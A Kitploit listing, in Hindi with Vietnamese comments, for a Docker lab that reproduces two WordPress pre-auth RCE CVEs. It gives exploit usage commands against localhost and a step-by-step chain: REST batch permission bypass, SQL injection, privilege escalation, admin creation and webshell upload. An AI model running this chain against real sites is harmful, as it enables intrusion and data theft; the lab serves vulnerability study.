Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — Docker-आधारित WordPress लैब जो CVE-2026-60137 और CVE-2026-63030 प्री-ऑथ RCE को पुनः उत्पन्न करती है, साथ में SQLi, विशेषाधिकार वृद्धि, और webshell तैनाती के लिए एक Python PoC exploit है। | Kitploit
उपकरण/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

Docker-आधारित WordPress लैब जो CVE-2026-60137 और CVE-2026-63030 प्री-ऑथ RCE को पुनः उत्पन्न करती है, साथ में SQLi, विशेषाधिकार वृद्धि, और webshell तैनाती के लिए एक Python PoC exploit है।

रिपॉजिटरी देखें
18घं 32मि पहलेअभी तक समीक्षित नहीं

wp2shell Lab — CVE-2026-60137 और CVE-2026-63030

WordPress Core Pre-Auth RCE लैब — वास्तविक शोषण, RCE सर्वर।

चेतावनी: लैब में VULNERABLE WordPress चल रहा है। इसे इंटरनेट पर एक्सपोज़ न करें।

संरचना

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC exploit (GitHub से क्लोन)
│   └── wp2shell.py        # पूर्ण RCE exploit
├── REPORT.md              # रूट कॉज़ विश्लेषण रिपोर्ट
└── README.md

सेटअप

1. लैब शुरू करें

root@kitploit:~
docker compose up -d

लॉग्स में LAB READY दिखने तक प्रतीक्षा करें:

root@kitploit:~
docker compose logs -f wpcli

2. PoC exploit क्लोन करें

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

यह exploit:

  • Python 3.7+, किसी pip install की आवश्यकता नहीं (केवल stdlib का उपयोग)
  • पासवर्ड क्रैक किए बिना नया admin अकाउंट बनाता है
  • स्वचालित रूप से webshell तैनात करता है
  • इंटरैक्टिव शेल

3. शोषण

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — tạo admin + deploy webshell + chạy command
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

सेवाएँ

Exploit प्रवाह सारांश

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] bị lệch index → req[1] nhận handler của req[2]
   → bypass permission_callback → SQLi vào WP_Query

2. SQL Injection (author__not_in)
   → Scalar string bypass is_array() check
   → Raw SQL inject vào WHERE clause

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post objects persist vào database

4. Changeset Privilege Escalation
   → WordPress switch current_user sang admin

5. Nested REST Request
   → Tạo admin account mới (không cần crack password)

6. Login + Upload webshell plugin → RCE

पैच सत्यापित करें

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

सफ़ाई

root@kitploit:~
docker compose down -v

संदर्भ

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
टूल डाउनलोड करें
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—